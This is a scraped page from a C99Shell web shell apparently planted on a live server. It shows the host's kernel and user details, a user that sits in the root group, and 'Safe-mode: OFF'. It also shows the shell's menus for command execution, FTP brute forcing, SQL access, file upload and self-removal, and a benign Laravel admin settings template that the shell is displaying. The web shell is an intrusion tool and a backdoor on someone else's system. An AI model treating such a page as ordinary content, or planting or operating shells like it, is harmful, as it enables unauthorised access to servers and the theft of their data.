!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picomail.picotech.app/public_html/resources/views/admin/settings/   drwxr-xr-x
Free 28.25 GB of 117.98 GB (23.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     app_update_form.blade.php (3.61 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="form-group">
    <label for="name">@lang('admin.form.input.app_name')</label>
    <input value="{{get_settings('app_name')}}" type="text" name="app_name" class="form-control" id="app_name"
           placeholder="@lang('admin.form.input.app_name')">
</div>

<div class="form-group">
    <label for="recaptcha_site_key">@lang('admin.form.input.recaptcha_site_key')</label>
    <input value="{{get_settings('recaptcha_site_key')}}" type="text" name="recaptcha_site_key" class="form-control" id="recaptcha_site_key"
           placeholder="@lang('admin.form.input.ex_recaptcha_site_key')">
</div>

<div class="form-group">
    <label for="tinymc_api_key">@lang('admin.form.input.tinymc_api_key')</label>
    <input value="{{get_settings('tinymc_api_key')}}" type="text" name="tinymc_api_key" class="form-control" id="tinymc_api_key"
           placeholder="@lang('admin.form.input.tinymc_api_key')">
</div>

<div class="form-group">
    <label for="favicon">@lang('admin.form.input.favicon')</label><img class="img-demo-setting" src="{{asset('uploads/'.get_settings('app_favicon'))}}" alt="">
    <div class="input-group">
        <div class="custom-file">
            <input name="favicon" type="file" class="custom-file-input" id="favicon">
            <label class="custom-file-label" for="favicon">@lang('admin.form.input.choose_file')</label>
        </div>
    </div>
</div>

<div class="form-group">
    <label for="logo">@lang('admin.form.input.logo')</label> <img class="img-demo-setting" src="{{asset('uploads/'.get_settings('app_logo'))}}" alt="">
    <div class="input-group">
        <div class="custom-file">
            <input name="logo" type="file" class="custom-file-input" id="logo">
            <label class="custom-file-label" for="logo">@lang('admin.form.input.choose_file')</label>
        </div>
    </div>
</div>
<div class="form-group">
    <label for="meta_title">@lang('admin.meta_title')</label>
    <input value="{{get_settings('meta_title')}}" type="text" name="meta_title" class="form-control" id="meta_title"
           placeholder="@lang('admin.meta_title')">
</div>

<div class="form-group">
    <label for="meta_description">@lang('admin.meta_description')</label>
    <textarea name="meta_description" id="meta_description" class="form-control" rows="5">{{get_settings('meta_description')}}</textarea>
</div>
<div class="form-group">
    <label for="facebook_link">@lang('admin.facebook_link')</label>
    <input value="{{get_settings('facebook_link')}}" type="text" name="facebook_link" class="form-control" id="facebook_link"
           placeholder="@lang('admin.facebook_link')">
</div>
<div class="form-group">
    <label for="twitter_link">@lang('admin.twitter_link')</label>
    <input value="{{get_settings('twitter_link')}}" type="text" name="twitter_link" class="form-control" id="twitter_link"
           placeholder="@lang('admin.twitter_link')">
</div>
<div class="form-group">
    <label for="instagram_link">@lang('admin.instagram_link')</label>
    <input value="{{get_settings('instagram_link')}}" type="text" name="instagram_link" class="form-control" id="instagram_link"
           placeholder="@lang('admin.instagram_link')">
</div>
<div class="form-group">
    <label for="status">@lang('admin.addon.customer_registration')</label>
    <select class="form-control" name="registration_status" id="registration_status">
        <option {{get_settings('registration_status')=='enable'?'selected':''}} value="enable">Enable</option>
        <option {{get_settings('registration_status')=='disable'?'selected':''}} value="disable">Disable</option>
    </select>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--